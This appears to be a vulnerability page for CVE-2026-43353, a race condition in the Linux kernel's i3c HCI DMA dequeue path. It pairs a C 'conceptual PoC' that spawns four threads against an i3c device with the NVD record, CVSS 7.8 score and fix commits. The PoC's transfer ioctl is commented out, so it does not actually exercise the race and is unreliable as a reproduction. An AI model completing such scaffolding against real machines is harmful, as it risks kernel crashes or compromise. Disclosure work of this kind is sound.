CVE-2026-43353

/* * Conceptual PoC for CVE-2026-43353 * This code attempts to trigger the race condition by spawning * multiple threads that perform I3C transfers likely to timeout. */ #include <stdio.h> #include <pthread.h> #include <unistd.h> #include <fcntl.h> #include <sys/ioctl.h> #define I3C_DEVICE "/dev/i3c-dev-0" void* trigger_timeout(void* arg) { int fd = open(I3C_DEVICE, O_RDWR); if (fd < 0) return NULL; // Loop to generate transfer requests // Real implementation would use specific IOCTLs to target HCI DMA for (int i = 0; i < 1000; i++) { // Simulate a transfer that might timeout or race // ioctl(fd, SOME_I3C_TRANSFER, ...); usleep(100); // Adjust timing to increase collision probability } close(fd); return NULL; } int main() { pthread_t t1, t2, t3, t4; // Create multiple threads to race in hci_dma_dequeue_xfer pthread_create(&t1, NULL, trigger_timeout, NULL); pthread_create(&t2, NULL, trigger_timeout, NULL); pthread_create(&t3, NULL, trigger_timeout, NULL); pthread_create(&t4, NULL, trigger_timeout, NULL); pthread_join(t1, NULL); pthread_join(t2, NULL); pthread_join(t3, NULL); pthread_join(t4, NULL); printf("PoC execution finished. Check kernel logs for crashes.\n"); return 0; }

{"cve": {"id": "CVE-2026-43353", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-08T15:16:46.043", "lastModified": "2026-05-11T08:16:11.043", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ni3c: mipi-i3c-hci: Fix race in DMA ring dequeue\n\nThe HCI DMA dequeue path (hci_dma_dequeue_xfer()) may be invoked for\nmultiple transfers that timeout around the same time. However, the\nfunction is not serialized and can race with itself.\n\nWhen a timeout occurs, hci_dma_dequeue_xfer() stops the ring, processes\nincomplete transfers, and then restarts the ring. If another timeout\ntriggers a parallel call into the same function, the two instances may\ninterfere with each other - stopping or restarting the ring at unexpected\ntimes.\n\nAdd a mutex so that hci_dma_dequeue_xfer() is serialized with respect to\nitself."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "references": [{"url": "https://git.kernel.org/stable/c/1dca8aee80eea76d2aae21265de5dd64f6ba0f09", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/4faa1e9c67a2229f6749190aedaf88ce0391efd2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/b684b420a5bb0ea1b0e13abfdb8ce41c5266e62e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}